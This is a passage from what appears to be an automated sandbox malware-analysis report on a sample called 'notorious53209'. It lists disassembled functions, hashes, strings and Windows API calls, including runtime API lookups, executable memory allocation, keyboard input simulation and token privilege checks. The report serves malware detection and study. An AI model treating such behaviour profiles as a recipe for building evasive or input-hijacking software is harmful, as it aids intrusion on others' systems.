                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                  • API String ID: 1943609520-557222456
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 008A52DD
                                                    • Part of subcall function 008B0340: __87except.LIBCMT ref: 008B037B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__87except__start
                                                  • String ID: pow
                                                  • API String ID: 2905807303-2276729525
                                                  • Opcode ID: 2d8d8ba9f9cbd4a32296abc2af460f7e89d0c21bf531580e5252c8ff54bc4efb
                                                  • Instruction ID: 541879a80a9d71487af26c6bee33b02815af430b16128580083d08e04d8d61b9
                                                  • Opcode Fuzzy Hash: 2d8d8ba9f9cbd4a32296abc2af460f7e89d0c21bf531580e5252c8ff54bc4efb
                                                  • Instruction Fuzzy Hash: 57517B21A1DA0686EB106718C9513FF6BD0FB42754F208968E4D5C1BE9EF748CD4EE8A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #$+
                                                  • API String ID: 0-2552117581
                                                  • Opcode ID: a9d68d4b09078f897f7549ffdc7a96154649ecf0280d974553cc530e37552b82
                                                  • Instruction ID: e177b24426fed319861020d9ebe2817b895ba4bd35e830b76dbf98b90a4d8509
                                                  • Opcode Fuzzy Hash: a9d68d4b09078f897f7549ffdc7a96154649ecf0280d974553cc530e37552b82
                                                  • Instruction Fuzzy Hash: 3151EE7550524A9FDF25AF28C4886FA7BA6FF1A310F144167E891DB3A0D7309D42CB71
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memset$_memmove
                                                  • String ID: ERCP
                                                  • API String ID: 2532777613-1384759551
                                                  • Opcode ID: 0562f97a431d04ca792027b6a8745ecbad9a96628287acc8a2594f209483f29b
                                                  • Instruction ID: 464392f45572afbfa8a0129d152eb3749e6935c2edea7a04e67ba21332db2e73
                                                  • Opcode Fuzzy Hash: 0562f97a431d04ca792027b6a8745ecbad9a96628287acc8a2594f209483f29b
                                                  • Instruction Fuzzy Hash: 4B51CE719007099BDF24DFA4C8857AABBF4FF04314F24856EEA4ACA240F7709A90CB44
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009076D0
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009076E4
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00907708
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: SysMonthCal32
                                                  • API String ID: 2326795674-1439706946
                                                  • Opcode ID: 63ed70fb6cf2434b1bae2866b1d00f1f21c553470252108117efad1f8c15dee4
                                                  • Instruction ID: a9bd2436b8e10adca23d1250864e3622183c34a14664a78fcc2dc9318d6c49e5
                                                  • Opcode Fuzzy Hash: 63ed70fb6cf2434b1bae2866b1d00f1f21c553470252108117efad1f8c15dee4
                                                  • Instruction Fuzzy Hash: 74219132514219BFDF11CF94CC46FEA3B69EB88764F110214FE15AB1D0DAB6B8519BA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00906FAA
                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00906FBA
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00906FDF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$MoveWindow
                                                  • String ID: Listbox
                                                  • API String ID: 3315199576-2633736733
                                                  • Opcode ID: baff54d427c5b591b8eb4c4ac036887f26f2d8c7832f7d95f60edef133c55ece
                                                  • Instruction ID: 77ae787e3f90a7f71c48f7d697350cc1a7acdeb29283822a81fc5a790cc2804f
                                                  • Opcode Fuzzy Hash: baff54d427c5b591b8eb4c4ac036887f26f2d8c7832f7d95f60edef133c55ece
                                                  • Instruction Fuzzy Hash: 7321C532610119BFDF118F54DC85FAB37AEEF89754F018124FA04971D0C771AC619BA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009079E1
                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009079F6
                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00907A03
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: msctls_trackbar32
                                                  • API String ID: 3850602802-1010561917
                                                  • Opcode ID: 1b0dfbef700654ad897dbad7b8297630b09f599543c26db9376f63879d80eaa8
                                                  • Instruction ID: 8036228c5dadc38eee09df911dc42f1f2aae6280c1e90ddb2ecc76c252c18bf1
                                                  • Opcode Fuzzy Hash: 1b0dfbef700654ad897dbad7b8297630b09f599543c26db9376f63879d80eaa8
                                                  • Instruction Fuzzy Hash: 9A11E372654208BEEF209FA4CC05FAB77ADEFC9B68F014519FA51A60D0D672A811DB60
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 008FC312
                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,008C1D88,?), ref: 008FC324
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                  • API String ID: 2574300362-1816364905
                                                  • Opcode ID: beac9d172dacee143597c13f5d7f6ee47cc4ba542eb51ca0a4e744cfb3c05aa4
                                                  • Instruction ID: 604852f38ee592954309cdb01875c62051f94de7a376020da725001eecddba10
                                                  • Opcode Fuzzy Hash: beac9d172dacee143597c13f5d7f6ee47cc4ba542eb51ca0a4e744cfb3c05aa4
                                                  • Instruction Fuzzy Hash: 41E08C7421430BCFCB344B75C814A9676D8FB48388F808439EA85C2750E770D940CAB0
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00884CA3
                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,00884C2E), ref: 00884CB5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                  • API String ID: 2574300362-192647395
                                                  • Opcode ID: e89b669481be792049e97881254111a695673f217c9dcef954420107387a528e
                                                  • Instruction ID: 1afa8cd2587d2c3f2ed1d88045f489735cff6a5ef10bf6a551da26946f241eee
                                                  • Opcode Fuzzy Hash: e89b669481be792049e97881254111a695673f217c9dcef954420107387a528e
                                                  • Instruction Fuzzy Hash: 18D01732528723CFD730AF31DA2860676EAFF05795B11883A988AD6990E674DA80CB50
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00884DA2
                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00884DB4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-1355242751
                                                  • Opcode ID: 752df5ded570fb244c91fbe26cf4c1285f58b057ea3d0e1147628a132fd70a67
                                                  • Instruction ID: 1005021e964be8cb80774446a85b0e70bdd69e83d80bbdf199ccdf362141a98e
                                                  • Opcode Fuzzy Hash: 752df5ded570fb244c91fbe26cf4c1285f58b057ea3d0e1147628a132fd70a67
                                                  • Instruction Fuzzy Hash: 2AD01772568713CFD730AF71D818A46B6E8FF09359B11883AD8C6D6990E770D880CB50
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00884D6F
                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884D81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-3689287502
                                                  • Opcode ID: e81ba11c53449fa43add13dcf7ca33d6eb627839964c72c1a9b2494a5e783b73
                                                  • Instruction ID: bf7a2d6df4fc0381dcadaf0fcd887f7b148ce6ad837ad736175a4018859c1820
                                                  • Opcode Fuzzy Hash: e81ba11c53449fa43add13dcf7ca33d6eb627839964c72c1a9b2494a5e783b73
                                                  • Instruction Fuzzy Hash: 7AD01771528713CFD730AF71D818616B6E8FF15356B118C3A9886D6A90E670D880CF50
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00901080
                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00901092
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                  • API String ID: 2574300362-4033151799
                                                  • Opcode ID: 6fe8507de8a6102cc4550fcde5168878bddb5c495fd94ca63005a6bad0d41c9f
                                                  • Instruction ID: fb6fbe532f5320a6b196336e0d403044786a02d1f776f71ee8defa77b66a4970
                                                  • Opcode Fuzzy Hash: 6fe8507de8a6102cc4550fcde5168878bddb5c495fd94ca63005a6bad0d41c9f
                                                  • Instruction Fuzzy Hash: BDD01730528712CFD7309F35E828A1B76F8AF59365F118D3AE8DADA590E770C8C0CA50
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 008F9403
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW,?,0090F910), ref: 008F9415
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                  • API String ID: 2574300362-199464113
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?), ref: 008FE3D2
                                                  • CharLowerBuffW.USER32(?,?), ref: 008FE415
                                                    • Part of subcall function 008FDAB9: CharLowerBuffW.USER32(?,?), ref: 008FDAD9
                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 008FE615
                                                  • _memmove.LIBCMT ref: 008FE628
                                                  Similarity
                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                  • String ID:
                                                  • API String ID: 3659485706-0
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 008F83D8
                                                  • CoUninitialize.OLE32 ref: 008F83E3
                                                    • Part of subcall function 008DDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 008DDAC5
                                                  • VariantInit.OLEAUT32(?), ref: 008F83EE
                                                  • VariantClear.OLEAUT32(?), ref: 008F86BF
                                                  Similarity
                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                  • String ID:
                                                  • API String ID: 780911581-0
                                                  APIs
                                                  • ProgIDFromCLSID.OLE32(?,00000000), ref: 008D7C32
                                                  • CoTaskMemFree.OLE32(00000000), ref: 008D7C4A
                                                  • CLSIDFromProgID.OLE32(?,?), ref: 008D7C6F
                                                  • _memcmp.LIBCMT ref: 008D7C90
                                                  Similarity
                                                  • API ID: FromProg$FreeTask_memcmp
                                                  • String ID:
                                                  • API String ID: 314563124-0
                                                  APIs
                                                  Similarity
                                                  • API ID: Variant$AllocClearCopyInitString
                                                  • String ID:
                                                  • API String ID: 2808897238-0
                                                  APIs
                                                  • GetWindowRect.USER32(00AD5190,?), ref: 00909AD2
                                                  • ScreenToClient.USER32(00000002,00000002), ref: 00909B05
                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00909B72
                                                  Similarity
                                                  • API ID: Window$ClientMoveRectScreen
                                                  • String ID:
                                                  • API String ID: 3880355969-0
                                                  APIs
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008EBB09
                                                  • GetLastError.KERNEL32(?,00000000), ref: 008EBB2F
                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008EBB54
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008EBB80
                                                  Similarity
                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                  • String ID:
                                                  • API String ID: 3321077145-0
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00908B4D
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  APIs
                                                  • ClientToScreen.USER32(?,?), ref: 0090AE1A
                                                  • GetWindowRect.USER32(?,?), ref: 0090AE90
                                                  • PtInRect.USER32(?,?,0090C304), ref: 0090AEA0
                                                  • MessageBeep.USER32(00000000), ref: 0090AF11
                                                  Similarity
                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                  • String ID:
                                                  • API String ID: 1352109105-0
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 008E1037
                                                  • SetKeyboardState.USER32(00000080), ref: 008E1053
                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008E10B9
                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 008E110B
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 008E1176
                                                  • SetKeyboardState.USER32(00000080), ref: 008E1192
                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 008E11F1
                                                  • SendInput.USER32(00000001,?,0000001C), ref: 008E1243
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008B644B
                                                  • __isleadbyte_l.LIBCMT ref: 008B6479
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008B64A7
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008B64DD
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 00905189
                                                    • Part of subcall function 008E387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008E3897
                                                    • Part of subcall function 008E387D: GetCurrentThreadId.KERNEL32(00000000,?,008E52A7), ref: 008E389E
                                                    • Part of subcall function 008E387D: AttachThreadInput.USER32(00000000,?,008E52A7), ref: 008E38A5
                                                  • GetCaretPos.USER32(?), ref: 0090519A
                                                  • ClientToScreen.USER32(00000000,?), ref: 009051D5
                                                  • GetForegroundWindow.USER32 ref: 009051DB
                                                  Similarity
                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                  • String ID:
                                                  • API String ID: 2759813231-0
                                                  APIs
                                                    • Part of subcall function 008D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008D8669
                                                    • Part of subcall function 008D8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008D8673
                                                    • Part of subcall function 008D8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8682
                                                    • Part of subcall function 008D8652: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 008D8689
                                                    • Part of subcall function 008D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D869F
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008D8BEB
                                                  • _memcmp.LIBCMT ref: 008D8C0E
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008D8C44
                                                  • HeapFree.KERNEL32(00000000), ref: 008D8C4B
                                                  Similarity
                                                  • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                                  • String ID:
                                                  • API String ID: 2182266621-0
                                                  APIs
                                                  • __setmode.LIBCMT ref: 008A0BF2
                                                    • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7B20,?,?,00000000), ref: 00885B8C
